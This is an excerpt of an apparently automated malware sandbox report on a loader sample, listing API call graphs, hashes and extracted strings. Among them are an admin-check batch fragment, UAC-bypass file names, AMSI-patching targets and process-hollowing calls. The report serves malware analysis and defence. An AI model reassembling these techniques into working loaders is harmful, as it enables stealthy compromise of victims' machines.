                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DateFormatLocaleThread
                                                                • String ID: yyyy
                                                                • API String ID: 3303714858-3145165042
                                                                • Opcode ID: f4f9b1a168fad18f2512f876823a0218d91cb5350c7343113b0681fa01df997a
                                                                • Instruction ID: bb6be81f61b4f78249c4e6f0cb65b3a9591dbad0ba344e36609a4fb4bc743310
                                                                • Opcode Fuzzy Hash: f4f9b1a168fad18f2512f876823a0218d91cb5350c7343113b0681fa01df997a
                                                                • Instruction Fuzzy Hash: A1218E75A10218AFFB10DF68C891AEEB7F9FF49720F5144A5E945E7240D730AE40CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:8.1%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:46.2%
                                                                Total number of Nodes:13
                                                                Total number of Limit Nodes:1

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 0-1875472624
                                                                • Opcode ID: f338fa60ecae63a453a5614efbc70434a42ed98d760109734ead480fbe0c153c
                                                                • Instruction ID: 5011c995430a73522f94384114e61cb14ceaced48c07d2cff7e8b086a9406cb9
                                                                • Opcode Fuzzy Hash: f338fa60ecae63a453a5614efbc70434a42ed98d760109734ead480fbe0c153c
                                                                • Instruction Fuzzy Hash: 3D734475A012298BDB22FB54DC98ADEB3B6AF84300F5184E5A909B7614CF70EEC1DF54
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027533EE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction ID: d1695c259c8ed4c18dd48cf87021176a314f9e4699da30460c453946e0dc00a0
                                                                • Opcode Fuzzy Hash: 22a1d6d18d8b963c772863b4da52e3d03dd5dd3f5047bdda74a2c3ee1410426e
                                                                • Instruction Fuzzy Hash: 1B111671B04128EFDB45DFA9D944A6EF7E9EF58690B1040A6EC08DB210D7B0DE11DB61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 027533EE
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.298922036.0000000002751000.00000020.00001000.00020000.00000000.sdmp, Offset: 02751000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_2751000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction ID: b51b53eaa91472ff6366d11061f29533b522febce8a4895d5756ac20703f33bd
                                                                • Opcode Fuzzy Hash: 82c66a6fbf721316cbf553693feb014f68e50e6b623acd09d83354257e4af27e
                                                                • Instruction Fuzzy Hash: 05F05471704228BFD705DAAADC84F6AF7ECDF546A1B1084A6FD08CB110E6B0DD00C670
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:8.2%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:924
                                                                Total number of Limit Nodes:12

                                                                Control-flow Graph

28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2895540 call 28848f4 call 2895698 call 2895540 call 28848f4 call 2895698 call 2884c24 call 2895698 call 2883c30 call 288304c call 2887c64 call 2884c24 call 2884d64 call 2884a98 call 2883c60 878->894 895 2898535-2898744 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2883c30 call 288304c call 2887c64 call 2884c24 call 2884d64 call 2884a98 call 2883c60 878->895 895->845 1272->1273 1279 289901f-289902e call 2884cb0 1272->1279 1307 28993dc-28993eb call 2884cb0 1273->1307 1308 2899841-28998c9 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884cb0 1273->1308 1279->1273 1284 2899034-2899349 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884dbc call 2894f34 1279->1284 1284->1273 1307->1308 1316 28993f1-2899400 call 2884cb0 1307->1316 1358 28998cf-28998de call 2884cb0 1308->1358 1359 2899a11-2899e29 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 
2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc 1308->1359 1316->1308 1325 2899406-289983c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc WinExec call 28945f8 OpenProcess NtSuspendProcess call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884dbc call 2893f94 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc 1316->1325 1325->1308 1358->1359 1371 28998e4-28998f3 call 2884cb0 1358->1371 1692 2899e2e-289a65b call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 
2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 1359->1692 1371->1359 1383 28998f9-2899a0c call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 call 28936cc call 2882fc4 call 2884dbc call 28948a4 1371->1383 1383->1359 1938 289a660-289a667 call 28936cc 1692->1938 1940 289a66c-289a6d4 call 2884c24 call 2884d64 call 2884a98 call 2884bb0 call 2884d64 call 2884a98 1938->1940 1952 289a6d9-289a6e0 call 28936cc 1940->1952 1954 289a6e5-289a707 call 2884a98 * 2 1952->1954 1958 289a70c-289a713 call 28936cc 1954->1958 1960 289a718-289a7ac call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc call 2884a98 * 2 call 28936cc 1958->1960 1978 289a7b1-289a7b3 ExitProcess 1960->1978
                                                                APIs
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C), ref: 02896DF0
                                                                  • Part of subcall function 0289521C: InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0289522C
                                                                  • Part of subcall function 0289521C: InternetOpenUrlA.WININET(028DDAA4,00000000,00000000,00000000,00000200,00000000), ref: 0289524F
                                                                  • Part of subcall function 0289521C: InternetCloseHandle.WININET(028DDAA4), ref: 028952E1
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0289AD5C,OpenSession,0289AD5C,ScanBuffer,0289AD5C,028DD8E0,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C), ref: 02896F3D
                                                                  • Part of subcall function 02895974: InternetCloseHandle.WININET(028DD4D0), ref: 02895A6F
                                                                  • Part of subcall function 02888134: GetFileAttributesA.KERNEL32(00000000,?,0289752B,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,ScanString,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession), ref: 0288813F
                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 02897929
                                                                  • Part of subcall function 02895698: _hwrite.KERNEL32(00000000,00000000,?), ref: 028956EF
                                                                  • Part of subcall function 02895698: _lclose.KERNEL32(00000000), ref: 028956F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: Internet$FileHandle$CloseModuleOpenSleep$AddressAttributesCopyFreeLibraryNameProc_hwrite_lclose
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$\FQ$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 3670926968-2746648207
                                                                • Opcode ID: ea70179ee3989c22d69cae98246874672dabea59912a7d75e1851532bcae3853
                                                                • Instruction ID: 4d4fc8d649dc746daeb684487351656aa3022e00cec476896b52663b9d99c884
                                                                • Opcode Fuzzy Hash: ea70179ee3989c22d69cae98246874672dabea59912a7d75e1851532bcae3853
                                                                • Instruction Fuzzy Hash: 5173203EA0111A8BDF21F768DC80ACE73B6EF84300F5484E69509E7315DE70AE999F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 02895698: _hwrite.KERNEL32(00000000,00000000,?), ref: 028956EF
                                                                  • Part of subcall function 02895698: _lclose.KERNEL32(00000000), ref: 028956F5
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02895724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                  • Part of subcall function 02895724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                • Sleep.KERNEL32(00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898A4C
                                                                • DeleteFileA.KERNEL32(00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898A80
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898ABA
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe,0289AE60), ref: 02898AF4
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60,easinvoker.exe), ref: 02898B2E
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat,0289AE60), ref: 02898B68
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00001388,ScanBuffer,0289AD5C,KDECO.bat,0289AE60,netutils.dll,0289AE60,ScanString,0289AD5C,O.bat), ref: 02898B9C
                                                                • WinExec.KERNEL32(iexpress,00000000), ref: 028994FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,028DDA9C,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 02899520
                                                                • NtSuspendProcess.NTDLL(028DDAA0), ref: 02899530
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                  • Part of subcall function 02894F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                  • Part of subcall function 028948A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                  • Part of subcall function 028948A4: GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                  • Part of subcall function 028948A4: ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                  • Part of subcall function 028948A4: NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                  • Part of subcall function 028948A4: VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,Initialize,0289AD5C,OpenSession,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 0289A7B3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.314991593.0000000002881000.00000020.00001000.00020000.00000000.sdmp, Offset: 02881000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_2881000_Uuddcmhn.jbxd
                                                                Similarity
                                                                • API ID: File$DeleteProcess$Virtual$Alloc$Handle$CloseCreateModule$AddressContextExecExitFreeLibraryMemoryNameObjectOpenProcProtectReadSectionSingleSleepSuspendThreadUnmapViewWait_hwrite_lclose
                                                                • String ID: AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$GetEventLogInformation$Initialize$KDECO.bat$NotifyChangeEventLog$NtCreateFile$NtOpenFile$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$advapi32$easinvoker.exe$iexpress$iexpress.exe$kernel32$netutils.dll$ntdll$shell32
                                                                • API String ID: 582351518-2677577270
                                                                • Opcode ID: 20a036ffbb59a7d77fae91aa82d4da0e26085e3a4a6dd8d147ab7903088f0e49
                                                                • Instruction ID: ac71435b1080308cde764d1440b53cb3f6f6b45aedc54d5f1bfda925fc709e46
                                                                • Opcode Fuzzy Hash: 20a036ffbb59a7d77fae91aa82d4da0e26085e3a4a6dd8d147ab7903088f0e49
                                                                • Instruction Fuzzy Hash: B4F2FE3EA0111A8BDF21F768DC80ACE73B6EF84300F5484E69109E7315DE74AE959F56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                  • Part of subcall function 028936CC: GetModuleHandleA.KERNEL32 ref: 02893725
                                                                  • Part of subcall function 028936CC: GetProcAddress.KERNEL32(028DD2F8,00000000), ref: 02893748
                                                                  • Part of subcall function 028936CC: FreeLibrary.KERNEL32(028DD2F8,00000000,00000000,02893792), ref: 02893772
                                                                  • Part of subcall function 02895724: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289583C
                                                                  • Part of subcall function 02895724: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895853
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 0289585C
                                                                  • Part of subcall function 02895724: CloseHandle.KERNEL32(?,?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,00000044,?), ref: 02895865
                                                                • Sleep.KERNEL32(000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028983CF
                                                                • DeleteFileA.KERNEL32(00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898403
                                                                • DeleteFileA.KERNEL32(00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 0289843D
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898477
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028984B1
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 028984EB
                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000032C8,ScanBuffer,0289AD5C,ScanString,0289AD5C), ref: 02898525
                                                                • WinExec.KERNEL32(iexpress,00000000), ref: 028994FF
                                                                • OpenProcess.KERNEL32(001F0FFF,000000FF,028DDA9C,iexpress,00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 02899520
                                                                • NtSuspendProcess.NTDLL(028DDAA0), ref: 02899530
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 02894F87
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FAD
                                                                  • Part of subcall function 02894F34: VirtualProtect.KERNEL32(?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 02894FD7
                                                                  • Part of subcall function 02894F34: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,00000002,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 0289502F
                                                                  • Part of subcall function 02882FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,028969CD,ScanBuffer,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,Initialize,0289AD5C,00000000), ref: 02882FE8
                                                                  • Part of subcall function 028948A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 02894959
                                                                  • Part of subcall function 028948A4: GetThreadContext.KERNEL32(028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C,028DD34C), ref: 0289497B
                                                                  • Part of subcall function 028948A4: ReadProcessMemory.KERNEL32(028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000,00000000,00000000,00000000,00000044,00000000,00000000,028DD35C), ref: 028949A3
                                                                  • Part of subcall function 028948A4: NtUnmapViewOfSection.NTDLL(028DD34C,7EF60310), ref: 028949C7
                                                                  • Part of subcall function 028948A4: VirtualAllocEx.KERNEL32(028DD34C,7EF60310,00000000,00003000,00000040,028DD34C,7EF60310,028DD34C,028DD43C,028DD474,00000004,028DD47C,028DD350,028DD3A0,00000000,00000000), ref: 028949EF
                                                                • ExitProcess.KERNEL32(00000000,OpenSession,0289AD5C,ScanBuffer,0289AD5C,Initialize,0289AD5C,OpenSession,0289AD5C,ScanString,0289AD5C,OpenSession,0289AD5C,OpenSession,0289AD5C,0289B044), ref: 0289A7B3
                                                                Strings
                                                                Memory Dump Source
